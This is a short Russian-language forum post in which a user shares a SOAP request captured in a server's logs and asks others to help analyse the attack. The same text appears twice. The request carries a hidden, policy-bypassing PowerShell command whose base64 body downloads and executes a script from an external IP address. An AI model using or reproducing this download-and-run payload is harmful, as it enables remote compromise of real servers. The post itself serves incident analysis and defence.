Ondrik8
04.06.2018, 13:43
Код:
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n
\n
\n
\n
\n
\n
\n cmd.exe
\n
\n
\n /c
\n
\n
\n Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQ ByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABp AG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE 4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgA ZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJw BdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAk AE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAG EAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEA MQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQ BzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java
возможно я спалил методику атаки... давайте разберемся!
кто что скажет?
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n
\n
\n
\n
\n
\n
\n cmd.exe
\n
\n
\n /c
\n
\n
\n Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQ ByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABp AG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE 4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgA ZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJw BdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAk AE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAG EAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEA MQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQ BzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java
возможно я спалил методику атаки... давайте разберемся!
кто что скажет?